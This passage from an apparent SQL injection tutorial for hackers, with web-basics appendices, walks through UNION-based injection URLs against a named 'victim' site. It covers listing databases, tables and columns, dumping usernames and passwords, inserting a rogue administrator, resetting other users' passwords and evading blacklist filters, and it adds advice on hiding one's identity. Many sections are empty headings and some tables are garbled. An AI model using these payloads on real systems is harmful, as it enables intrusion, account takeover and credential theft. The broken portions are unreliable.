In Microsoft SQL Server, things are slightly different. First of all, there is no database called information_schema on Microsoft SQL Servers. Instead, there is a database called master. For more info about this and the other default databases, see chapter 9. To select a table from a specific database on Microsoft SQL Server, you put – not one dot, as in MySQL – but two dots between the database name and the table name. Let’s say we want to get the content of the table called sysdatabases which is on the database master. We would do it like this:
SELECT * FROM master..sysdatabases
On this table, there is a column called name. It contains the name of each database. To query this column, we would use:
SELECT name FROM master..sysdatabases
This can be done with the following URL:
www.sqlinject.comule.com/article.php?id=5+union+select+null, ,null,null,null+from master..sysdatabases
That’s how we do it on Microsoft SQL Servers. Now, the sysdatabases table has the same task as the information_schema.schemata table on MySQL. It contains every single database on the server, including the built in ones. In case you would like to know what database is currently in use, which will in almost all cases return the user-built database with interesting information, use:
SELECT DB_name()
This can be done with the following URL: www.sqlinject.comule.com/article.php?id=5+union+select+null,DB_name(),null,null,null
Keep in mind that you would have to find the column count and data types, as well as which columns can be extracted through first, and modify the query accordingly.
Step-by-Step: Finding databases on Microsoft SQL Server
1. Add +union+select+null,name,null+from+master..sysdatabases to the URL.2. Adjust the query accordingly to how many columns you have discovered and which
columns are displayed.
4.9 Listing tables
MySQL
For listing tables, use www.sqlinject.comule.com/article.php?id=5+union+select+null,table_name,null,null,null+from+information_schema.tables
As you see, you get a great view of all the tables. I have scrolled to the bottom here:
“Users” seems like an interesting table. Note it down along with other table names of interest. The limit technique described in previous section can be used here as well. If you want to exclude all the default tables from the list, you can use www.sqlinject.comule.com/article.php?id=5+union+select+null,table_name,null,null,null+from+information_schema.tables+where+schema_name=database()
Users seem to be an interesting table, so note it down so you can use it later.
Microsoft SQL Server
Now, on every database there is a built-in table called sysobjects. It should contain table names and more, similarly to information_schema.tables on MySQL. There are two interesting columns on this table. The first one is name which contains the name of the table, the second one is xtype, which contains info about whether the table is user created or built in by default. We are interested in the user created ones, so we would look for rows with an xtype of ‘U’ which stands for user. We would need the following query:
SELECT name FROM sysobjects
WHERE xtype=’U’
This would be done with an URL like this: www.sqlinject.comule.com/article.php?id=5+union+select+null, name,null,null,null+from+sysobjects+where+xtype=’U’
That would list every table that is created by the user. As earlier, you can use the limit technique if only one result is shown, or if the amount of tables creates unbearable load time.
Oracle
On oracle, the process is fairly simple. Oracle is a tad different from MySQL and Microsoft SQL Server, but don’t let it confuse you. The main concepts are the same. On Oracle, this is how we find the table names:
SELECT table_name FROM all_tables
This translates into the following URL:
www.sqlinjection.comule.com/article.php?id=5+union+select+table_name+from+all_tables
On Oracle, you might be interested in knowing which user owns the table. This can easily be done by adding an owner to the query columns.
SELECT owner,table_name FROM all_tables
This translates into the following URL:
www.sqlinjection.comule.com/article.php?id=5+union+select+owner,table_name+from+all_tables
4.10 Listing columns
MySQL
To get a list of all the columns on the database, as well as which table they belong to, use:
www.sqlinject.comule.com/article.php?id=5+union+select+null,table_name,column_name,null,null+from+information_schema.columns
This will give you an overview over the columns in the database and which table they belong to. Find the columns that belong to the tables you are interested in. As you can see here:
“Username” and “password” seem to be interesting ones. It is now time to use all our info to extract the values. Just like above, you can add +where+schema_name=database() to exclude all columns in default tables.
If you want to get columns from a specific table, add +where+table_name=’users’
That would return all columns from the users table.
Microsoft SQL Server
There is another built in table on each database in Microsoft SQL Servers. It is called syscolumns. It contains all columns on the entire database, just like information_schema.columns in MySQL. There are two columns in this table that we are interested in:
4.11 Extracting data
We now know that there is a table called users. We also know that there are columns called username and password on that table. Now to get the values of these columns, we use:
www.sqlinject.comule.com/article.php?id=5+union+select+null,username,password,null,null+from+users
There you go. All the users along with their passwords listed elegantly. If we wish to receive only the password of a specific user, we would add +where+username=’john’
4.12 Combining two values into one column
But what if there was a third column that we couldn’t extract because we only had two working data entries? We can use a technique called concat however. Concat works like this:
Concat(“text1”, “text2”)
This will return in the following string:
“text1text2”
This is very handy when there is only one vulnerable column to inject trough. It cannot only be used with static text. You can also do like this:
SELECT+Concat(username, “:”, password)+from+users
The “:” in the middle is simply to divide them. The result will be like this:
“John:mys3cr3tp@ss”
If you wish to combine the values of a certain column in all rows returned, you can use a similar function, called group_concat.
SELECT+Group_Concat(username)+FROM+users
The result is:
“John, user2, user3, Kate”
Every row’s value of username, separated by a comma is returned, because that is how the group_concat function works. In reality, you would have to add nulls of course. If there were, say 5 columns and the third one was vulnerable and displayed, you would use:
SELECT+null,null,group_concat(username),null,null+from+users
And the same goes for concat.
5.1 The concept
So what are you going to learn in this chapter? The most fun part! You have tested security and extracted information, but if you are ready for some action, then this chapter is just what you need. We are going to insert ourselves into administrator tables, inject our content into the website and more!
5.2 Gaining admin access
In chapter 1, you learned the most basic way of granting yourself administrator access. I then promised that you would learn the more advanced stuff later and here we are. I will teach you how to do this on the three most common Database Servers: MySQL, Microsoft SQL Server and Oracle.
5.3 Adding a row
I will now teach you how to insert a row, perhaps with a new administrator into the admins table, so read carefully. We have used the techniques described in chapter 2 to find out that the database contains a table called users in which there are four columns; id, user, pass and admin. The victim, as always, is www.sqlinjection.comule.com/article.php?id=5 . The id column contains a number for identification. The number is one higher for each row in the database and not interesting. The user and pass are obvious, while admin contains 0 if the user is not admin and 1 if he is. If you do not know how to find out these things, go back to chapter 4. Now our goal is to insert a new row into the users table containing our username of choice, password of choice and 1 in the admin column, making us administrators. We are going to use this piece of SQL:
INSERT INTO users (user, pass, admin) VALUES (‘Haxor’, ‘mypass’, 1)
There is one problem though; how are we going to add this to the query? In Microsoft SQL Server and certain versions of Oracle, the answer would be stacked queries, but this is not possible in MySQL unless the owner has enabled it which isn’t very likely. More on stacked queries in section 5.7
5.3 Using UPDATE
UPDATE is an SQL command. What it does, is to change the value of one or more columns. The syntax is like this:
UPDATE users
SET password = ‘newpassword’
WHERE username = ‘john’
This would make the password of the user “John” be “newpassword”. You can also leave the WHERE clause out, but that would make the password of every single user ‘newpassword.’ In most cases, this is not what we want, so be careful to add a WHERE clause. To perform an update query on a website, you must either find a page that does actually update something, such as a user control panel where you can change your password. When you find one you can change the WHERE clause by adding +or+1=1 for example. Otherwise, you can use stacked queries which is described in the next section.
5.4 Using stacked queries
5.5 Defacing with INTO UPFILE
5.6 Deleting data
5.7 Exploiting UPDATE pages
Many websites give the user power over one or more UPDATE query in their application. This might be trough a change password function or through profile customization where you can choose your gender, email and more. These can be exploited quite easily. Let’s do a basic example, similar to the one in chapter two. We have a function in a website, where you can change your password. By exploiting this function, we will change the password of any user we want, or of every user, if we prefer that.
Let’s take a look at the form:
As you see, there is a textbox accepting a new password and a button that submits the whole thing. Now, let’s take a look at the query that will happen when you click this button.
EVADING INPUT FILTERS
6.1 What are input filters?
An input filter is a process that removes all dangerous input before the input is used. A perfect input filter removes everything that might cause trouble or that might give hackers an opportunity to break into the system. Those are rare however, most websites have an input filter, but one that can be outsmarted with some creativity. Some websites doesn’t have input filters at all. In this chapter, I will go through the most common input filters and how to outsmart them. Here is a model that explains input filters:
6.2 Blacklist filter
A blacklist filter is a filter that removes all instances of certain words. Filters are written in PHP which you can learn more about in chapter 9. Here is source code for an example blacklist filter:
blacklist = array(“OR”, “AND”, “UNION”, “SELECT”, “’”);
input = $_GET(‘id’);
Gather inputInput filter:
Remove dangerous content from input
Database:Use the input that has gone trough
the filter.
input.strstring(blacklist);
This code removes all instances of the words OR, AND, UNION and SELECT as well as the symbol ‘. This kind of filter can be bypassed quite easily. To make a word such as UNION go through the filter, we can use so-called wrapping:
UNUNIONION
See what I did there? I put one UNION inside another. The filter will remove the UNION in the middle and the wrapped UNION will be left effective. Another way to do it is to add comments (see chapter 9 to learn about comments) which will make the word seem different to the filter, but which will make no change to the query:
UN/**/ION
The word is no longer UNION, so the input filter won’t find it. However, the comment has no effect on the query, so the result would be the same. If this should fail as well, you can try case variation:
UnIoN sElEcT
Because the case is different, the filter won’t find it. As you know, this won’t affect the query because in SQL, case doesn’t matter. When symbols such as the single quote (‘) or the plus sign (+) is filtered out, we can use some other methods. Primarily, there is URL encoding. Change it to the corresponding encoded version:
Symbol Encoded‘ %2B+
6.3 Length-based filter
Some filters use only a certain amount of the digits or characters entered. For example, a page might only use the first two digits.
6.4 Whitelist filter
6.5 Whitespace removal filter
6.7 Case-based filter
HIDING YOUR IDENTITY
7.1 Disclaimer
This section is here only to provide information on how to hide your identity online. Hiding your identity on the internet is in no context illegal or immoral. As a hacker, you will most likely prefer to keep your real identity secret, simply because hackers are normally associated with criminals. Having a hidden identity does not remove the law however. Remember that official instances usually can trace you no matter how you hide yourself on the internet.
7.2 IP addresses
IP stands for Internet Protocol and it is a series of numbers which is unique to each individual computer and/or network. An IP address is used just like physical addresses. They tell websites where to send the requested HTML page and so on. IP is also the main form of identification on the internet. When a website decides to ban someone, they might ban their IPs to be sure the person will not create a new account. An IP address reveals some info about where the computer is stationed. More precisely it gives information about where their Internet Provider hosts their connection, but this usually means that one can find out which city you reside in. With an IP address and sufficient permissions, you might find out exactly who the owner is, his name, address and more. Hackers therefore tend to want to hide their IP address. This is done by getting a new one, one that does not give any true info about you. This can be done either through a proxy or through a VPN (Virtual Private Network).
7.3 Proxies
7.4 VPNs / Virtual Private Networks
REFERENCE
9.1 SQL
SQL stands for Structured Query Language and it is used to make changes, or perform queries from a database. I am about to teach you the basics. To gather the value of specific columns from a specific table, use:
SELECT column1,column2 FROM table1
If you want to gather the data from every single column, replace the columns with an asterix:
SELECT * FROM table1
Both of these will return every row in the table, if you want to only gather data from one specific row, use:
SELECT * FROM table1
WHERE column1 = x
This will only find data from rows where the value of column1 is x. It’s good practice to have a column called id in every table. Id should simply be a number, starting at 1 then going higher for each row. That way you can find whatever row you want with
SELECT * FROM table1
WHERE id = 1
If you want to insert a new row into a table, you do it like this:
INSERT INTO table1
VALUES (valueToColumn1, ValueToColumn2, ValueToColumn3)
Or if you want to leave say, column1 to be the default value and only enter values into column2 and column3, use:
INSERT INTO table1 (column2, column3)
VALUES (ValueToColumn2, ValueToColumn3)
To delete a row from the database, use:
DELETE * FROM table1
WHERE id = x
Leave out the second line to delete all data from the table.
To delete a table in entirety, use:
DROP TABLE table1
And to delete a database, use:
DROP DATABASE database1
To create a database, use:
CREATE DATABASE database1
To create a table, use:
CREATE TABLE table1 (column1 datatype1, column2 datatype2)
To change how a table is, use:
ALTER table1
To change the content of a column, use:
UPDATE table1 SET column1 = newValue WHERE id = x
9.2 HTML
HTML is the most essential language of the internet. Practically speaking, all websites are written primarily in HTML. HTML stands for Hyper Text Markup Language. An HTML document consists of two kinds of objects; text and tags. A tag is anything between a < and a > while text is everything else. The text is displayed as text, while the tags affect how the text is displayed. For example, there is a tag <b> which stands for bold. Now, a sample HTML document might look like this:
This is some text <b>this is some bold text</b>
This would translate into:
This is some text this is some text
As you may have noticed, the <b> tag were written two times, at the beginning and at the end, but at the end, a / was put before it. That is because most tags in HTML come in pairs.; an opening tag and a closing tag. The closing tag is equal to the opening tag, except there is a / before the tag name. All good HTML documents should look like this:
<html>
<head>
Some settings you don’t need to worry about
</head>
<body>
The webpage content is here <b>and this is bold</b>
</body>
</html>
The entire document should be inside an <html> tag. The content of the website should be inside <body> tags which again are inside the <html> tags. There should also be a <head> tag which should wrap settings about the document. Before we proceed, you should know that there are some tags which come alone, without any closing tags. These tags look like this:
<tagname/>
Another thing to know about is attributes. Every tag has attributes that can be set. An attribute is a setting that applies for the content of that tag. For example, you might give a title to a specific element, so that it can be recognized easier by other languages, using the Title attribute.
<tagname title=’ThisIsTheTitle’>Content</tagname>
Here is a list of the most important settings that can be put in the <head> section:
Tag Meaning<title>Title of document</title> The title which will be displayed on top of
the browser.<style>CSS style goes here</title> A style written in CSS which will be described
later.<link rel=’StyleSheet’ type=’text/css’ href=’style.css’/>
A style in CSS that is stored in another file.
<script type=’text/javascript’>Javascript code</script>
For creating functions and more in Javascript that will apply to the document.
<script type=’text/javascript’ href=’javascriptdocument.js’></script>
Importing a Javascript file that is stored elsewhere.
And the most important tag that should be placed in the <body> section:
Tag Function<p>Content</p> Paragraph. Put all stand-alone text in this so
you can easily change its appearance in CSS.<div>content</div> A group of elements. Can also be used as a
box or container. Stands for division.<span>content</span> Same as <div> but for a piece of text.<table><tr><td>TableData1</td> A table with two rows, each containing two
<td>TableData2</td></tr><tr><td>TableData1</td><td>TableData2</td></tr></table>
columns. Tables are great for layout as well as for displaying SQL resources.
<ul><li>List item 1</li><li>List item 2</li></ul>
An unordered list.
<ol><li>List item 1</li><li>List item 2</li></ol>
An ordered list, with for example 1. 2. Etc. as numbering.
<img src=’image.png’/> An image<a href=’otherpage.html’>Click!</a> A hyperlink
9.3 PHP
PHP stands for Pre-Processed Hypertext. It should really have been called PPH, but PHP seemed a better name. PHP is used to perform things on the server side that is invisible to the user, or to do things with results from the database. To implement PHP into an HTML document, do like this:
<html>
<head>
<title>My Sample Website</title>
</head>
<body>
<b>Some bold text</b>
<?php
Php code here
?>
</body>
</html>
<?php opens PHP and ?> closes it. Unlike HTML, PHP is built up of statements. A statement is a command to the website on what to do. Every statement must end with a semicolon (;).
Here is a list of important PHP statements:
Statement EffectEcho “text”; Prints some text to the HTML document$a = 5; / $b = “test” Makes the value of the variable $a become 5
/ The variable called $b become “test”. All PHP variables should start with $.
Mysql_query(“SELECT * FROM table1”); Perform a query to a MySQL database.MySQL_Connect($server, $user, $pass); Connects to a MySQL ServerMySQL_Select_Db(“database1”); Select a database
9.4 CSS
CSS stands for Cascading Style Sheets and is the language used to design how elements in an HTML document looks. Here is a basic CSS document:
Body
{
Background-color:black;
}
P
{
Color:white;
}
This makes the background color of the body (the entire webpage) black and all paragraphs white. Now we can make an HTML element have a style or a class like this:
<html>
<body>
<p id=’firstparagraph’>Test</p>
<p class=’secondparagraph’>Test2</p>
</body>
</html>
To apply a style to all elements with a certain id, add use #idname. For a class, use .classname.
#firstparagraph
{
Color:gray;
}
.secondparagraph
{
Color:yellow;
}
So that’s CSS. Here is a list of important properties:
Property EffectColor:black; Makes the color of the text blackBackground-color:black; Makes the background color blackMargin-left:50px; Makes the element positioned 50 pixels
from the left.Border:2px solid black Makes the element have a 2px wide, solid
black border.Background-image:url(‘imagepath’); Sets a background-image for the element
9.5 Javascript
Javascript is a language used to add interactivity to websites. It looks like this:
Document.write(“<b>This bold text is added by Javascript”);
Document.body.style.background-color = “black”;
What these two lines do is to add This bold text is added by Javascript to the document, and change the webpage background color to black. Like in PHP, a statement must end with a semicolon.
9.6 Comments
A comment is a piece of text in a script that is not executed. It is used to add notices and instructions, but can also be used by hackers to disable code. Here are comments on various database servers:
Server CommentMySQL -- comment
# comment/* Comment */
Microsoft SQL Server
9.7 MySQL
Here is a list of tables on the information_schema table:
Table name Info Important ColumnsSchemata Info about databases Catalog_name, Schema_name,
Default_Characterset_name, Default_Collation_Name, SQL_Path
Tables Info about tables Table_Catalog, Table_name, Table_Type
Columns Info about columns on other tables
9.8 Oracle
9.9 Microsoft SQL Server
9.10 Logical operators
9.11 Errors
9.12 Data types
Data types are various formats in which data can be stored. Here are the most important:
Datatype ExplanationInteger A whole numberString A piece of textAnd some SQL datatypes that are more precise
Datatype ExplanationInteger A whole numberString A piece of text
1.13 Tools & Tutorials